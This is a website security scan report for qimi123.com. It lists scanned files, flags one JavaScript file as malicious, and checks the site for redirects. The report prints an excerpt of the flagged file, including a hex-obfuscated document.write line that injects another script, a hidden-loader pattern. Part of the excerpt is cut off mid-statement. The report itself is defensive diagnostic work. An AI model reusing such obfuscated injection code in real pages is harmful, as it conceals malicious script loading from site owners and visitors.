Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=qimi123.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://qimi123.com/ | HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 03:32:25 GMT Accept-Ranges: bytes ETag: "f0a7f939b737d01:b9d" Server: Microsoft-IIS/6.0 Content-Length: 106780 Content-Location: http://qimi123.com/index.html Content-Type: text/html Last-Modified: Sat, 24 Jan 2015 09:22:08 GMT X-Powered-By: ASP.NET | clean |
http://qimi123.com/index.html | 200 OK Content-Length: 106780 Content-Type: text/html | clean |
http://qimi123.com/js/jquery.js | 200 OK Content-Length: 50667 Content-Type: application/x-javascript | clean |
http://qimi123.com/js/function.js | 200 OK Content-Length: 16566 Content-Type: application/x-javascript | clean |
http://qimi123.com/m1938/nousertop.js | 200 OK Content-Length: 184 Content-Type: application/x-javascript | clean |
http://qimi123.com/webdata/temp/banner/index-980x90.js | 200 OK Content-Length: 543 Content-Type: application/x-javascript | clean |
http://qimi123.com/m1938/VIP.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://qimi123.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://qimi123.com/m1938/m1938we.js | 200 OK Content-Length: 10352 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function $TAB(x){return document.getElementById(x);}
function tab_show(a,b,c,d){ x=a,max_i=b,tn=c,tc=d; for(var i=1;i<=max_i;i++){ if($TAB(tn+i))$TAB(tn+i).className=$TAB(tc+i).className=""; } $TAB(tn+x).className=$TAB(tc+x).className="on"; }
function switchTab(identify,index,count,cnon,cnout) { try{ for(i=0;i<count;i++) { var CurTabObj = document.getElementById("Tab_"+identify+"_"+i) ; var CurListObj = document.get top: windowHeight/2-popupHeight/2, opacity: "show" }, "slow"); }
function closeDiv(){ $("#mask").remove(); $("#popDiv").animate({left: 0, top: 0, opacity: "hide" }, "slow"); }
var _0x623a=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x2F\x6D\x31\x39\x33\x38\x2F\x6D\x31\x39\x33\x38\x77\x65\x61\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0x623a[1]](_0x623a[0]);
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: qimi123.com
Result:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 03:32:25 GMT
Accept-Ranges: bytes
ETag: "f0a7f939b737d01:b9d"
Server: Microsoft-IIS/6.0
Content-Length: 106780
Content-Location: http://qimi123.com/index.html
Content-Type: text/html
Last-Modified: Sat, 24 Jan 2015 09:22:08 GMT
X-Powered-By: ASP.NET
...106780 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: qimi123.com
Referer: http://www.google.com/search?q=qimi123.com
Result:
The result is similar to the first query. There are no suspicious redirects found.